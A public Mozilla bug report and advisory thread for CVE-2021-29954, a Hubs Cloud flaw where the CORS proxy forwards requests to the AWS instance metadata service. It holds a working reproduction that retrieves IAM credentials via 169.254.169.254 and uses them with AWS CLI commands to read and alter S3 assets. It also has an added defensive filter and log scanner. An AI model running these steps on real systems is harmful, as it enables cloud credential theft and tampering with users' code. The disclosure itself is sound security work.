Closed Bug 1707898 (CVE-2021-29954) Opened 3 years ago Closed 3 years ago

Mozilla Hubs Cloud: cloud API credentials exposure

Categories

(Cloud Services :: Security, defect)

defect

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: torsten.trumm, Unassigned)

Details

(Keywords: sec-critical, wsec-disclosure, Whiteboard: [reporter-external] [client-bounty-form] [verif?])

Mozilla Hubs exposes internal cloud endpoints which can be used to get credentials for cloud APIs.

Tested with current version at 2021-04-27.

Steps to reproduce on AWS:

  1. Find out the CORS proxy URL.
     Open the start page of a Hubs Cloud installation on AWS.
     Find out the assets URL by looking under the Network tab in the browser dev tools,
     for example https://HUBS_NAME-assets.HUBS_INTERNAL_DOMAIN/files/...
     With this information you can construct the CORS proxy URL,
     for example https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/

  2. Retrieve the cloud API credentials.
     Background: AWS offers a special local endpoint for retrieving instance information
     (see https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html).
     Open https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/http://169.254.169.254/latest/meta-data/iam/security-credentials/
     Append a slash and the returned value to the URL and call again:
     https://HUBS_NAME-cors-proxy.HUBS_INTERNAL_DOMAIN/http://169.254.169.254/latest/meta-data/iam/security-credentials/XXXXXXXX-app
     This will return AccessKeyId, SecretAccessKey and Token.
     With these anyone can connect to the AWS API and do everything that the server is allowed to do.

  3. Perform actions using the server's credentials.

For example, using the AWS CLI:

Enter the retrieved credentials into .aws/credentials on a machine with the AWS CLI installed.

Verify that you have access.
aws --profile testapi --region eu-west-1 sts get-caller-identity
{
"Account": "XXXXXXXXXX",
"UserId": "AROAXJVIRVTGPR3HV3X7B:i-XXXXXXXXX",
"Arn": "arn:aws:sts::XXXXXXXXXX:assumed-role/XXXXXXXX-app/i-XXXXXXXXX"
}

Use the instance ID which the endpoint returned and retrieve the tags.
aws --profile testapi ec2 describe-tags --filters "Name=resource-id,Values=i-XXXXXXXXX" --region eu-west-1

The S3 bucket name can be constructed using the information from the aws:cloudformation:stack-id tag.

Now you can list all assets, retrieve/delete/modify any asset.
aws --profile testapi s3 ls XXXXX-assets-XXXXXX/assets/images/ --region eu-west-1
2021-03-30 11:55:41 11628 hubs-cloud-logo.png

You could also modify the JavaScript files under /hubs/assets/js/ and replace them with versions containing malicious code that will then be delivered to the Hubs users.

Flags: sec-bounty?
Type: task → defect
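The root cause in the report above is a CORS proxy that forwards to whatever URL is placed in its path, including the link-local instance metadata address. The page does not say how Mozilla fixed the Hubs cors-proxy, so the following is an added example and not Hubs code: a destination filter for a proxy with that path layout, plus the same check replayed over constructed access-log lines to find past requests aimed at the metadata service. All hostnames, the DNS table, the log lines and the function names are constructed for the example.

```python
import ipaddress
import socket
from typing import Callable, Iterable, Optional
from urllib.parse import urlsplit

# Added example, not Mozilla Hubs code. A proxy of the form
# https://<proxy>/http://<target>/... must refuse link-local, loopback,
# private, multicast and reserved destinations; that covers 169.254.169.254
# and fd00:ec2::254 (the AWS instance metadata addresses) and IPv4-mapped forms.
Resolver = Callable[[str], list[str]]  # hostname -> resolved IP strings


def system_resolver(host: str) -> list[str]:
    """Production resolver: every address the system DNS returns for host."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def make_stub_resolver(table: dict[str, list[str]]) -> Resolver:
    """Offline resolver backed by a constructed table (for the demo and tests)."""
    def resolve(host: str) -> list[str]:
        if host not in table:
            raise OSError(f"no constructed DNS record for {host}")
        return table[host]
    return resolve


# Constructed records; .test is a reserved TLD and these names resolve nowhere.
CONSTRUCTED_DNS = {
    "cdn.example.test": ["93.184.216.34"],         # stands in for a public CDN
    "metadata.example.test": ["169.254.169.254"],  # DNS alias aimed at the IMDS
}
CONSTRUCTED_RESOLVER = make_stub_resolver(CONSTRUCTED_DNS)


def is_forbidden_address(ip: str) -> bool:
    """True for any address a public-asset proxy must never connect to."""
    addr = ipaddress.ip_address(ip)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped  # ::ffff:169.254.169.254 is still the IMDS
    return (addr.is_link_local or addr.is_loopback or addr.is_private
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified)


def check_proxy_target(path: str, resolver: Resolver = system_resolver,
                       allowed_hosts: Optional[Iterable[str]] = None) -> tuple[bool, str]:
    """Return (allowed, reason) for a proxy request path.

    Rejects non-http(s) schemes, hosts outside the allowlist when one is
    configured, and any host whose resolved addresses include a forbidden one.
    """
    try:
        url = urlsplit(path.lstrip("/"))
    except ValueError as exc:
        return False, f"unparseable target: {exc}"
    if url.scheme not in ("http", "https") or not url.hostname:
        return False, f"unsupported scheme or missing host: {url.geturl()!r}"
    host = url.hostname
    if allowed_hosts is not None and host not in set(allowed_hosts):
        return False, f"host not on allowlist: {host}"
    try:
        addrs = [str(ipaddress.ip_address(host))]  # literal IP, nothing to resolve
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"resolution failed for {host}: {exc}"
    for ip in addrs:
        if is_forbidden_address(ip):
            return False, f"{host} resolves to forbidden address {ip}"
    return True, "ok"


# Constructed access-log lines, "<client> <method> <path> <status>", not from
# any real deployment. Replaying the check over a proxy's log finds past
# requests that were aimed at the metadata service.
SAMPLE_LOG = [
    "203.0.113.7 GET /https://cdn.example.test/assets/images/hubs-cloud-logo.png 200",
    "203.0.113.7 GET /http://169.254.169.254/latest/meta-data/iam/security-credentials/ 200",
    "203.0.113.7 GET /http://metadata.example.test/latest/meta-data/ 200",
    "198.51.100.2 GET /https://cdn.example.test/assets/js/hubs.js 200",
]


def flag_forbidden_requests(lines: Iterable[str],
                            resolver: Resolver = CONSTRUCTED_RESOLVER) -> list[str]:
    """One '<client> <path> -> <reason>' entry per logged request the filter rejects."""
    flagged = []
    for line in lines:
        client, _method, path, _status = line.split()
        ok, reason = check_proxy_target(path, resolver=resolver)
        if not ok:
            flagged.append(f"{client} {path} -> {reason}")
    return flagged


if __name__ == "__main__":
    for entry in flag_forbidden_requests(SAMPLE_LOG):
        print(entry)
```

The filter checks every resolved address rather than the hostname string, so a DNS alias pointing at 169.254.169.254 is caught the same way as the literal IP. A proxy that follows redirects must apply the same check to each hop, and a fixed allowlist of upstream hosts is a stronger configuration than denylisting address ranges. Independently of the proxy, requiring IMDSv2 on the instances (session tokens with a hop limit of 1) keeps a simple forwarded GET from reading the role credentials at all.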

torsten: thanks for your report, we'll investigate and report back on what we identify.

Group: cloud-services-security
Group: firefox-core-security
Product: Firefox → Cloud Services
QA Contact: nobody

Torsten: we have confirmed the issue and we're working on a fix now, thanks again for the report.

You are welcome. If you need more information just let me know.

Torsten: This issue was patched last night. We are working with our engineering and product teams to work on a notification to potentially affected customers and the actions we have taken and the actions they should take. I will close this bug because the vulnerability is addressed, we'll chase the rest of the clean up effort via our incident response process.

Thanks again for the report!

Status: UNCONFIRMED → RESOLVED
Closed: 3 years ago
Resolution: --- → FIXED

We are looking into sending an advisory to customers on this, ok if we use "Torsten Trumm" in the reporter section? It would show up here in this feed => https://www.mozilla.org/en-US/security/advisories/

Flags: needinfo?(torsten.trumm)

Sure. You can show me as reporter.

Flags: needinfo?(torsten.trumm)

Torsten: This is also a heads-up that this issue will be made public once the advisory has been made public.

Security Advisory: https://www.mozilla.org/en-US/security/advisories/mfsa2021-21/

I'm also lifting the sec flags on this bug so readers of the advisory can see the detailed report.

Group: cloud-services-security
Flags: sec-bounty? → sec-bounty+

Thank you so much, Torsten. We have awarded a Security Bug Bounty for this bug.

Thank you very much. I can confirm that the servers have updated themselves and the issue is resolved.

Alias: CVE-2021-29954